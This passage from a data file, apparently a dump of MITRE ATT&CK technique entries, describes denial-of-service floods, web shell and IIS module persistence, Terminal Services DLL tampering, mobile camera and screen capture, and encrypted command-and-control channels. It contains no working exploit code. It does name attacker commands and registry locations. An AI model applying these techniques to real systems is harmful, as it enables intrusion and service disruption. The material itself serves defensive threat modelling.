                              'avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)\n'
                              '\n'
                              'Benign commands or other operations may also be used to delay malware execution. Loops '
                              'or otherwise needless repetitions of commands, such as '
                              '[Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware '
                              'execution and potentially exceed time thresholds of automated analysis '
                              'environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another '
                              'variation, commonly referred to as API hammering, involves making various calls to '
                              '[Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay '
                              'execution (while also potentially overloading analysis environments with junk '
                              'data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)\n'
                              '\n'
                              'Adversaries may also use time as a metric to detect sandboxes and analysis '
                              'environments, particularly those that attempt to manipulate time mechanisms to simulate '
                              'longer elapses of time. For example, an adversary may be able to identify a sandbox '
                              "accelerating time by sampling and calculating the expected value for an environment's "
                              'timestamp before and after execution of a sleep function.(Citation: ISACA Malware '
                              'Tricks)',
               'name': 'Time Based Evasion',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1498': {'attack_id': 'T1498',
           'categories': ['impact'],
           'description': 'Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the '
                          'availability of targeted resources to users. Network DoS can be performed by exhausting the '
                          'network bandwidth services rely on. Example resources include specific websites, email '
                          'services, DNS, and web-based applications. Adversaries have been observed conducting '
                          'network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February '
                          '2016) and to support other malicious activities, including distraction(Citation: FSISAC '
                          'FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October '
                          '2014)\n'
                          '\n'
                          'A Network DoS will occur when the bandwidth capacity of the network connection to a system '
                          'is exhausted due to the volume of malicious traffic directed at the resource or the network '
                          'connections and network devices the resource relies on. For example, an adversary may send '
                          '10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the '
                          'internet. This traffic can be generated by a single system or multiple systems spread '
                          'across the internet, which is commonly referred to as a distributed DoS (DDoS).\n'
                          '\n'
                          'To perform Network DoS attacks several aspects apply to multiple methods, including IP '
                          'address spoofing, and botnets.\n'
                          '\n'
                          'Adversaries may use the original IP address of an attacking system, or spoof the source IP '
                          'address to make the attack traffic more difficult to trace back to the attacking system or '
                          'to enable reflection. This can increase the difficulty defenders have in defending against '
                          'the attack by reducing or eliminating the effectiveness of filtering by the source address '
                          'on network defense devices.\n'
                          '\n'
                          'For DoS attacks targeting the hosting system directly, see [Endpoint Denial of '
                          'Service](https://attack.mitre.org/techniques/T1499).',
           'name': 'Network Denial of Service',
           'platforms': ['Windows',
                         'Azure AD',
                         'Office 365',
                         'SaaS',
                         'IaaS',
                         'Linux',
                         'macOS',
                         'Google Workspace',
                         'Containers']},
 'T1498.001': {'attack_id': 'T1498.001',
               'categories': ['impact'],
               'description': 'Adversaries may attempt to cause a denial of service (DoS) by directly sending a '
                              'high-volume of network traffic to a target. This DoS attack may also reduce the '
                              'availability and functionality of the targeted system(s) and network. [Direct Network '
                              'Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are '
                              "used to send a high-volume of network packets towards the targeted service's network. "
                              'Almost any network protocol may be used for flooding. Stateless protocols such as UDP '
                              'or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n'
                              '\n'
                              'Botnets are commonly used to conduct network flooding attacks against networks and '
                              'services. Large botnets can generate a significant amount of traffic from systems '
                              'spread across the global Internet. Adversaries may have the resources to build out and '
                              'control their own botnet infrastructure or may rent time on an existing botnet to '
                              'conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many '
                              'systems are used to generate the flood that each one only needs to send out a small '
                              'amount of traffic to produce enough volume to saturate the target network. In such '
                              'circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly '
                              'difficult. Botnets have been used in some of the most high-profile DDoS flooding '
                              'attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: '
                              'USNYAG IranianBotnet March 2016)',
               'name': 'Direct Network Flood',
               'platforms': ['Windows',
                             'Azure AD',
                             'Office 365',
                             'SaaS',
                             'IaaS',
                             'Linux',
                             'macOS',
                             'Google Workspace']},
 'T1498.002': {'attack_id': 'T1498.002',
               'categories': ['impact'],
               'description': 'Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume '
                              'of network traffic to a target. This type of Network DoS takes advantage of a '
                              'third-party server intermediary that hosts and will respond to a given spoofed source '
                              'IP address. This third-party server is commonly termed a reflector. An adversary '
                              'accomplishes a reflection attack by sending packets to reflectors with the spoofed '
                              'address of the victim. Similar to Direct Network Floods, more than one system may be '
                              'used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors '
                              'may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May '
                              '2017) This Network DoS attack may also reduce the availability and functionality of the '
                              'targeted system(s) and network.\n'
                              '\n'
                              'Reflection attacks often take advantage of protocols with larger responses than '
                              'requests in order to amplify their traffic, commonly known as a Reflection '
                              'Amplification attack. Adversaries may be able to generate an increase in volume of '
                              'attack traffic that is several orders of magnitude greater than the requests sent to '
                              'the amplifiers. The extent of this increase will depending upon many variables, such as '
                              'the protocol in question, the technique used, and the amplifying servers that actually '
                              'produce the amplification in attack volume. Two prominent protocols that have enabled '
                              'Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and '
                              'NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the '
                              'wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In particular, '
                              'the memcache protocol showed itself to be a powerful protocol, with amplification sizes '
                              'up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)',
               'name': 'Reflection Amplification',
               'platforms': ['Windows',
                             'Azure AD',
                             'Office 365',
                             'SaaS',
                             'IaaS',
                             'Linux',
                             'macOS',
                             'Google Workspace']},
 'T1499': {'attack_id': 'T1499',
           'categories': ['impact'],
           'description': 'Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the '
                          'availability of services to users. Endpoint DoS can be performed by exhausting the system '
                          'resources those services are hosted on or exploiting the system to cause a persistent crash '
                          'condition. Example services include websites, email services, DNS, and web-based '
                          'applications. Adversaries have been observed conducting DoS attacks for political '
                          'purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious '
                          'activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, '
                          'and extortion.(Citation: Symantec DDoS October 2014)\n'
                          '\n'
                          'An Endpoint DoS denies the availability of a service without saturating the network used to '
                          'provide access to the service. Adversaries can target various layers of the application '
                          'stack that is hosted on the system used to provide the service. These layers include the '
                          'Operating Systems (OS), server applications such as web servers, DNS servers, databases, '
                          'and the (typically web-based) applications that sit on top of them. Attacking each layer '
                          'requires different techniques that take advantage of bottlenecks that are unique to the '
                          'respective components. A DoS attack may be generated by a single system or multiple systems '
                          'spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n'
                          '\n'
                          'To perform DoS attacks against endpoint resources, several aspects apply to multiple '
                          'methods, including IP address spoofing and botnets.\n'
                          '\n'
                          'Adversaries may use the original IP address of an attacking system, or spoof the source IP '
                          'address to make the attack traffic more difficult to trace back to the attacking system or '
                          'to enable reflection. This can increase the difficulty defenders have in defending against '
                          'the attack by reducing or eliminating the effectiveness of filtering by the source address '
                          'on network defense devices.\n'
                          '\n'
                          'Botnets are commonly used to conduct DDoS attacks against networks and services. Large '
                          'botnets can generate a significant amount of traffic from systems spread across the global '
                          'internet. Adversaries may have the resources to build out and control their own botnet '
                          'infrastructure or may rent time on an existing botnet to conduct an attack. In some of the '
                          'worst cases for DDoS, so many systems are used to generate requests that each one only '
                          'needs to send out a small amount of traffic to produce enough volume to exhaust the '
                          "target's resources. In such circumstances, distinguishing DDoS traffic from legitimate "
                          'clients becomes exceedingly difficult. Botnets have been used in some of the most '
                          'high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US '
                          'banks.(Citation: USNYAG IranianBotnet March 2016)\n'
                          '\n'
                          'In cases where traffic manipulation is used, there may be points in the global network '
                          '(such as high traffic gateway routers) where packets can be altered and cause legitimate '
                          'clients to execute code that directs network packets toward a target in high volume. This '
                          'type of capability was previously used for the purposes of web censorship where client HTTP '
                          'traffic was modified to include a reference to JavaScript that generated the DDoS code to '
                          'overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)\n'
                          '\n'
                          'For attacks attempting to saturate the providing network, see [Network Denial of '
                          'Service](https://attack.mitre.org/techniques/T1498).\n',
           'name': 'Endpoint Denial of Service',
           'platforms': ['Windows',
                         'Azure AD',
                         'Office 365',
                         'SaaS',
                         'IaaS',
                         'Linux',
                         'macOS',
                         'Google Workspace',
                         'Containers']},
 'T1499.001': {'attack_id': 'T1499.001',
               'categories': ['impact'],
               'description': "Adversaries may launch a denial of service (DoS) attack targeting an endpoint's "
                              "operating system (OS). A system's OS is responsible for managing the finite resources "
                              'as well as preventing the entire system from being overwhelmed by excessive demands on '
                              'its capacity. These attacks do not need to exhaust the actual resources on a system; '
                              'the attacks may simply exhaust the limits and available resources that an OS '
                              'self-imposes.\n'
                              '\n'
                              'Different ways to achieve this exist, including TCP state-exhaustion attacks such as '
                              'SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, '
                              'excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never '
                              'completed. Because each OS has a maximum number of concurrent TCP connections that it '
                              'will allow, this can quickly exhaust the ability of the system to receive new requests '
                              'for TCP connections, thus preventing access to any TCP service provided by the '
                              'server.(Citation: Cloudflare SynFlood)\n'
                              '\n'
                              'ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are '
                              'sent to the target. This forces the OS to search its state table for a related TCP '
                              'connection that has already been established. Because the ACK packets are for '
                              'connections that do not exist, the OS will have to search the entire state table to '
                              'confirm that no match exists. When it is necessary to do this for a large flood of '
                              'packets, the computational requirements can cause the server to become sluggish and/or '
                              'unresponsive, due to the work it must do to eliminate the rogue ACK packets. This '
                              'greatly reduces the resources available for providing the targeted service.(Citation: '
                              'Corero SYN-ACKflood)',
               'name': 'OS Exhaustion Flood',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1499.002': {'attack_id': 'T1499.002',
               'categories': ['impact'],
               'description': 'Adversaries may target the different network services provided by systems to conduct a '
                              'denial of service (DoS). Adversaries often target the availability of DNS and web '
                              'services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport '
                              'Jan 2018) Web server software can be attacked through a variety of means, some of which '
                              'apply generally while others are specific to the software being used to provide the '
                              'service.\n'
                              '\n'
                              'One example of this type of attack is known as a simple HTTP flood, where an adversary '
                              'sends a large number of HTTP requests to a web server to overwhelm it and/or an '
                              'application that runs on top of it. This flood relies on raw volume to accomplish the '
                              'objective, exhausting any of the various resources required by the victim software to '
                              'provide the service.(Citation: Cloudflare HTTPflood)\n'
                              '\n'
                              'Another variation, known as a SSL renegotiation attack, takes advantage of a protocol '
                              'feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and '
                              'server to agree on an encryption algorithm to use for subsequent secure connections. If '
                              'SSL renegotiation is enabled, a request can be made for renegotiation of the crypto '
                              'algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection '
                              'and then proceeds to make a series of renegotiation requests. Because the cryptographic '
                              'renegotiation has a meaningful cost in computation cycles, this can cause an impact to '
                              'the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)',
               'name': 'Service Exhaustion Flood',
               'platforms': ['Windows',
                             'Azure AD',
                             'Office 365',
                             'SaaS',
                             'IaaS',
                             'Linux',
                             'macOS',
                             'Google Workspace']},
 'T1499.003': {'attack_id': 'T1499.003',
               'categories': ['impact'],
               'description': 'Adversaries may target resource intensive features of applications to cause a denial of '
                              'service (DoS), denying availability to those applications. For example, specific '
                              'features in web applications may be highly resource intensive. Repeated requests to '
                              'those features may be able to exhaust system resources and deny access to the '
                              'application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)',
               'name': 'Application Exhaustion Flood',
               'platforms': ['Windows',
                             'Azure AD',
                             'Office 365',
                             'SaaS',
                             'IaaS',
                             'Linux',
                             'macOS',
                             'Google Workspace']},
 'T1499.004': {'attack_id': 'T1499.004',
               'categories': ['impact'],
               'description': 'Adversaries may exploit software vulnerabilities that can cause an application or '
                              'system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) '
                              'Some systems may automatically restart critical applications and services when crashes '
                              'occur, but they can likely be re-exploited to cause a persistent denial of service '
                              '(DoS) condition.\n'
                              '\n'
                              'Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or '
                              'systems, which may also lead to dependent applications and/or systems to be in a DoS '
                              'condition. Crashed or restarted applications or systems may also have other effects '
                              'such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Firmware '
                              'Corruption](https://attack.mitre.org/techniques/T1495), [Service '
                              'Stop](https://attack.mitre.org/techniques/T1489) etc. which may further cause a DoS '
                              'condition and deny availability to critical information, applications and/or systems. ',
               'name': 'Application or System Exploitation',
               'platforms': ['Windows',
                             'Azure AD',
                             'Office 365',
                             'SaaS',
                             'IaaS',
                             'Linux',
                             'macOS',
                             'Google Workspace']},
 'T1505': {'attack_id': 'T1505',
           'categories': ['persistence'],
           'description': 'Adversaries may abuse legitimate extensible development features of servers to establish '
                          'persistent access to systems. Enterprise server applications may include features that '
                          'allow developers to write and install software or scripts to extend the functionality of '
                          'the main application. Adversaries may install malicious components to extend and abuse '
                          'server applications.(Citation: volexity_0day_sophos_FW)',
           'name': 'Server Software Component',
           'platforms': ['Windows', 'Linux', 'macOS', 'Network']},
 'T1505.001': {'attack_id': 'T1505.001',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse SQL stored procedures to establish persistent access to systems. '
                              'SQL Stored Procedures are code that can be saved and reused so that database users do '
                              'not waste time rewriting frequently used SQL queries. Stored procedures can be invoked '
                              'via SQL statements to the database using the procedure name or via defined events (e.g. '
                              'when a SQL server application is started/restarted).\n'
                              '\n'
                              'Adversaries may craft malicious stored procedures that can provide a persistence '
                              'mechanism in SQL database servers.(Citation: NetSPI Startup Stored '
                              'Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands '
                              'through SQL syntax the adversary may have to enable additional functionality, such as '
                              'xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: '
                              'Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) \n'
                              '\n'
                              'Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR '
                              'integration enabled, application developers can write stored procedures using any .NET '
                              'framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) '
                              'Adversaries may craft or modify CLR assemblies that are linked to stored procedures '
                              'since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI '
                              'SQL Server CLR) ',
               'name': 'SQL Stored Procedures',
               'platforms': ['Windows', 'Linux']},
 'T1505.002': {'attack_id': 'T1505.002',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse Microsoft transport agents to establish persistent access to '
                              'systems. Microsoft Exchange transport agents can operate on email messages passing '
                              'through the transport pipeline to perform various tasks such as filtering spam, '
                              'filtering malicious attachments, journaling, or adding a corporate signature to the end '
                              'of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET '
                              'LightNeuron May 2019) Transport agents can be written by application developers and '
                              'then compiled to .NET assemblies that are subsequently registered with the Exchange '
                              'server. Transport agents will be invoked during a specified stage of email processing '
                              'and carry out developer defined tasks. \n'
                              '\n'
                              'Adversaries may register a malicious transport agent to provide a persistence mechanism '
                              'in Exchange Server that can be triggered by adversary-specified email events.(Citation: '
                              'ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all '
                              'emails passing through the Exchange transport pipeline, the agent can be configured to '
                              'only carry out specific tasks in response to adversary defined criteria. For example, '
                              'the transport agent may only carry out an action like copying in-transit attachments '
                              'and saving them for later exfiltration if the recipient email address matches an entry '
                              'on a list provided by the adversary. ',
               'name': 'Transport Agent',
               'platforms': ['Linux', 'Windows']},
 'T1505.003': {'attack_id': 'T1505.003',
               'categories': ['persistence'],
               'description': 'Adversaries may backdoor web servers with web shells to establish persistent access to '
                              'systems. A Web shell is a Web script that is placed on an openly accessible Web server '
                              'to allow an adversary to access the Web server as a gateway into a network. A Web shell '
                              'may provide a set of functions to execute or a command-line interface on the system '
                              'that hosts the Web server.(Citation: volexity_0day_sophos_FW)\n'
                              '\n'
                              'In addition to a server-side script, a Web shell may have a client interface program '
                              'that is used to talk to the Web server (e.g. [China '
                              'Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee '
                              '2013)',
               'name': 'Web Shell',
               'platforms': ['Linux', 'Windows', 'macOS', 'Network']},
 'T1505.004': {'attack_id': 'T1505.004',
               'categories': ['persistence'],
               'description': 'Adversaries may install malicious components that run on Internet Information Services '
                              '(IIS) web servers to establish persistence. IIS provides several mechanisms to extend '
                              'the functionality of the web servers. For example, Internet Server Application '
                              'Programming Interface (ISAPI) extensions and filters can be installed to examine and/or '
                              'modify incoming and outgoing IIS web requests. Extensions and filters are deployed as '
                              'DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, '
                              '<code>Http{Extension/Filter}Proc</code>, and (optionally) '
                              '<code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend '
                              'IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft '
                              'ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module '
                              '2013)\n'
                              '\n'
                              'Adversaries may install malicious ISAPI extensions and filters to observe and/or modify '
                              'traffic, execute commands on compromised machines, or proxy command and control '
                              'traffic. ISAPI extensions and filters may have access to all IIS web requests and '
                              'responses. For example, an adversary may abuse these mechanisms to modify HTTP '
                              'responses in order to distribute malicious commands/content to previously comprised '
                              'hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI '
                              'Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming '
                              '2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI '
                              'Filter 2012)\n'
                              '\n'
                              'Adversaries may also install malicious IIS modules to observe and/or modify traffic. '
                              'IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests '
                              'and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that '
                              'exports <code>RegisterModule</code>, or as a .NET application that interfaces with '
                              'ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview '
                              '2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)',
               'name': 'IIS Components',
               'platforms': ['Windows']},
 'T1505.005': {'attack_id': 'T1505.005',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse components of Terminal Services to enable persistent access to '
                              'systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some '
                              'Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal '
                              'Services allows servers to transmit a full, interactive, graphical user interface to '
                              'clients via RDP.(Citation: Microsoft Remote Desktop Services)\n'
                              '\n'
                              '[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a '
                              '"generic" process (ex: <code>svchost.exe</code>) load the service\'s DLL file, the '
                              'location of which is stored in a Registry entry named '
                              '<code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The '
                              '<code>termsrv.dll</code> file, typically stored in `%SystemRoot%\\System32\\`, is the '
                              'default <code>ServiceDll</code> value for Terminal Services in '
                              '`HKLM\\System\\CurrentControlSet\\services\\TermService\\Parameters\\`.\n'
                              '\n'
                              'Adversaries may modify and/or replace the Terminal Services DLL to enable persistent '
                              'access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL '
                              'could be done to execute arbitrary payloads (while also potentially preserving normal '
                              '<code>termsrv.dll</code> functionality) as well as to simply enable abusable features '
                              'of Terminal Services. For example, an adversary may enable features such as concurrent '
                              '[Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by '
                              'either patching the <code>termsrv.dll</code> file or modifying the '
                              '<code>ServiceDll</code> value to point to a DLL that provides increased RDP '
                              'functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server '
                              'Windows OS this increased functionality may also enable an adversary to avoid Terminal '
                              'Services prompts that warn/log out users of a system when a new RDP session is created.',
               'name': 'Terminal Services DLL',
               'platforms': ['Windows']},
 'T1509': {'attack_id': 'T1509',
           'categories': ['command-and-control'],
           'description': 'Adversaries may generate network traffic using a protocol and port pairing that are '
                          'typically not associated. For example, HTTPS over port 8088 or port 587 as opposed to the '
                          'traditional port 443. Adversaries may make changes to the standard port used by a protocol '
                          'to bypass filtering or muddle analysis/parsing of network data.',
           'name': 'Non-Standard Port',
           'platforms': ['Android', 'iOS']},
 'T1512': {'attack_id': 'T1512',
           'categories': ['collection'],
           'description': 'An adversary can leverage a device’s cameras to gather information by capturing video '
                          'recordings. Images may also be captured, potentially in specified intervals, in lieu of '
                          'video files.  \n'
                          '\n'
                          ' \n'
                          '\n'
                          'Malware or scripts may interact with the device cameras through an available API provided '
                          'by the operating system. Video or image files may be written to disk and exfiltrated later. '
                          'This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1513) due '
                          'to use of the device’s cameras for video recording rather than capturing the victim’s '
                          'screen. \n'
                          '\n'
                          ' \n'
                          '\n'
                          'In Android, an application must hold the `android.permission.CAMERA` permission to access '
                          'the cameras. In iOS, applications must include the `NSCameraUsageDescription` key in the '
                          '`Info.plist` file. In both cases, the user must grant permission to the requesting '
                          'application to use the camera. If the device has been rooted or jailbroken, an adversary '
                          'may be able to access the camera without knowledge of the user.  ',
           'name': 'Video Capture',
           'platforms': ['Android', 'iOS']},
 'T1513': {'attack_id': 'T1513',
           'categories': ['collection'],
           'description': 'Adversaries may use screen capture to collect additional information about a target device, '
                          'such as applications running in the foreground, user data, credentials, or other sensitive '
                          'information. Applications running in the background can capture screenshots or videos of '
                          'another application running in the foreground by using the Android `MediaProjectionManager` '
                          '(generally requires the device user to grant consent).(Citation: Fortinet screencap July '
                          '2019)(Citation: Android ScreenCap1 2019) Background applications can also use Android '
                          'accessibility services to capture screen contents being displayed by a foreground '
                          'application.(Citation: Lookout-Monokle) An adversary with root access or Android Debug '
                          'Bridge (adb) access could call the Android `screencap` or `screenrecord` '
                          'commands.(Citation: Android ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015) ',
           'name': 'Screen Capture',
           'platforms': ['Android']},
 'T1516': {'attack_id': 'T1516',
           'categories': ['defense-evasion', 'impact'],
           'description': 'A malicious application can inject input to the user interface to mimic user interaction '
                          "through the abuse of Android's accessibility APIs.\n"
                          '\n'
                          '[Input Injection](https://attack.mitre.org/techniques/T1516) can be achieved using any of '
                          'the following methods:\n'
                          '\n'
                          "* Mimicking user clicks on the screen, for example to steal money from a user's PayPal "
                          'account.(Citation: android-trojan-steals-paypal-2fa)\n'
                          '* Injecting global actions, such as `GLOBAL_ACTION_BACK` (programatically mimicking a '
                          'physical back button press), to trigger actions on behalf of the user.(Citation: Talos '
                          'Gustuff Apr 2019)\n'
                          '* Inserting input into text fields on behalf of the user. This method is used legitimately '
                          'to auto-fill text fields by applications such as password managers.(Citation: bitwarden '
                          'autofill logins)',
           'name': 'Input Injection',
           'platforms': ['Android']},
 'T1517': {'attack_id': 'T1517',
           'categories': ['collection', 'credential-access'],
           'description': 'Adversaries may collect data within notifications sent by the operating system or other '
                          'applications. Notifications may contain sensitive data such as one-time authentication '
                          'codes sent over SMS, email, or other mediums. In the case of Credential Access, adversaries '
                          'may attempt to intercept one-time code sent to the device. Adversaries can also dismiss '
                          'notifications to prevent the user from noticing that the notification has arrived and can '
                          'trigger action buttons contained within notifications.(Citation: ESET 2FA Bypass) ',
           'name': 'Access Notifications',
           'platforms': ['Android']},
 'T1518': {'attack_id': 'T1518',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of software and software versions that are '
                          'installed on a system or in a cloud environment. Adversaries may use the information from '
                          '[Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery '
                          'to shape follow-on behaviors, including whether or not the adversary fully infects the '
                          'target and/or attempts specific actions.\n'
                          '\n'
                          'Such software may be deployed widely across the environment for configuration management or '
                          'security reasons, such as [Software Deployment '
                          'Tools](https://attack.mitre.org/techniques/T1072), and may allow adversaries broad access '
                          'to infect devices or move laterally.\n'
                          '\n'
                          'Adversaries may attempt to enumerate software for a variety of reasons, such as figuring '
                          'out what security measures are present or if the compromised system has a version of '
                          'software that is vulnerable to [Exploitation for Privilege '
                          'Escalation](https://attack.mitre.org/techniques/T1068).',
           'name': 'Software Discovery',
           'platforms': ['Windows', 'IaaS', 'Linux', 'macOS']},
 'T1518.001': {'attack_id': 'T1518.001',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to get a listing of security software, configurations, '
                              'defensive tools, and sensors that are installed on a system or in a cloud environment. '
                              'This may include things such as cloud monitoring agents and anti-virus. Adversaries may '
                              'use the information from [Security Software '
                              'Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to '
                              'shape follow-on behaviors, including whether or not the adversary fully infects the '
                              'target and/or attempts specific actions.\n'
                              '\n'
                              'Example commands that can be used to obtain security software information are '
                              '[netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with '
                              '[Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with '
                              '[cmd](https://attack.mitre.org/software/S0106), and '
                              '[Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery '
                              'behavior may be more specific to the type of software or security system the adversary '
                              'is looking for. It is becoming more common to see macOS malware perform checks for '
                              'LittleSnitch and KnockKnock software.\n'
                              '\n'
                              'Adversaries may also utilize the [Cloud '
                              'API](https://attack.mitre.org/techniques/T1059/009) to discover cloud-native security '
                              'software installed on compute infrastructure, such as the AWS CloudWatch agent, Azure '
                              'VM Agent, and Google Cloud Monitor agent. These agents  may collect  metrics and logs '
                              'from the VM, which may be centrally aggregated in a cloud-based monitoring platform.',
               'name': 'Security Software Discovery',
               'platforms': ['Windows', 'IaaS', 'Linux', 'macOS']},
 'T1521': {'attack_id': 'T1521',
           'categories': ['command-and-control'],
           'description': 'Adversaries may explicitly employ a known encryption algorithm to conceal command and '
                          'control traffic rather than relying on any inherent protections provided by a communication '
                          'protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to '
                          'reverse engineering if necessary secret keys are encoded and/or generated within malware '
                          'samples/configuration files.',
           'name': 'Encrypted Channel',
           'platforms': ['Android', 'iOS']},
 'T1521.001': {'attack_id': 'T1521.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may employ a known symmetric encryption algorithm to conceal command and '
                              'control traffic, rather than relying on any inherent protections provided by a '
                              'communication protocol. Symmetric encryption algorithms use the same key for plaintext '
                              'encryption and ciphertext decryption. Common symmetric encryption algorithms include '
                              'AES, Blowfish, and RC4.',
               'name': 'Symmetric Cryptography',
               'platforms': ['Android', 'iOS']},
 'T1521.002': {'attack_id': 'T1521.002',
               'categories': ['command-and-control'],
               'description': 'Adversaries may employ a known asymmetric encryption algorithm to conceal command and '
                              'control traffic, rather than relying on any inherent protections provided by a '
                              'communication protocol. Asymmetric cryptography, also known as public key cryptography, '
                              'uses a keypair per party: one public that can be freely distributed, and one private '
                              'that should not be distributed. Due to how asymmetric algorithms work, the sender '
                              'encrypts data with the receiver’s public key and the receiver decrypts the data with '
                              'their private key. This ensures that only the intended recipient can read the encrypted '
                              'data. Common public key encryption algorithms include RSA, ElGamal, and ECDSA.\n'
                              '\n'
                              'For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a '
                              'connection is established, but use asymmetric cryptography to establish or transmit a '
                              'key. As such, these protocols are classified as [Asymmetric '
                              'Cryptography](https://attack.mitre.org/techniques/T1521/002).',
               'name': 'Asymmetric Cryptography',
               'platforms': ['Android', 'iOS']},
 'T1521.003': {'attack_id': 'T1521.003',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use [SSL Pinning](https://attack.mitre.org/techniques/T1521/003)  to '
                              'protect the C2 traffic from being intercepted and analyzed.\n'
                              '\n'
                              '[SSL Pinning](https://attack.mitre.org/techniques/T1521/003)  is a technique commonly '
                              'utilized by legitimate websites to ensure that encrypted communications are only '
                              'allowed with a pre-defined certificate. If another certificate is presented, it could '
                              'indicate device compromise, traffic interception, or another upstream issue. While '
                              'benign usages are common, it is also possible for adversaries to abuse this technology '
                              'to protect malicious C2 traffic.\n'
                              '\n'
                              'In normal, not pinned SSL validation, when a client connects to a server using HTTPS, '
                              'it typically checks whether the server’s SSL/TLS certificate is signed by a trusted '
                              'Certificate Authority (CA) in the device’s trust store. If the certificate is valid and '
                              'signed by a trusted CA, the connection is established. However, with [SSL '
                              'Pinning](https://attack.mitre.org/techniques/T1521/003) , the client is configured to '
                              'trust a specific SSL/TLS certificate or public key, rather than relying on the device’s '
                              'trust store. This means that even if the server’s certificate is signed by a trusted '
                              'CA, the client will only establish the connection of the certificate or key is pinned.\n'
                              '\n'
                              'There are two types of [SSL Pinning](https://attack.mitre.org/techniques/T1521/003) :\n'
                              '\n'
                              '1.\tCertificate Pinning: The client stores a copy of the server’s certificate and '
                              'compares it with the certificate received during the SSL handshake. If the certificates '
                              'match, then the client proceeds with the connection. This approach also works with '
                              'self-signed certificates.\n'
                              '\n'
                              '2.\tPublic Key Pinning: Instead of pinning the entire certificate, the client pins just '
                              'the public key extracted from the certificate. This is often more flexible, as it '
                              'allows the server to renew its certificate without having to update the pinned '
                              'certificate or breaking the SSL connection.',
               'name': 'SSL Pinning',
               'platforms': ['Android', 'iOS']},
 'T1525': {'attack_id': 'T1525',
           'categories': ['persistence'],
           'description': 'Adversaries may implant cloud or container images with malicious code to establish '
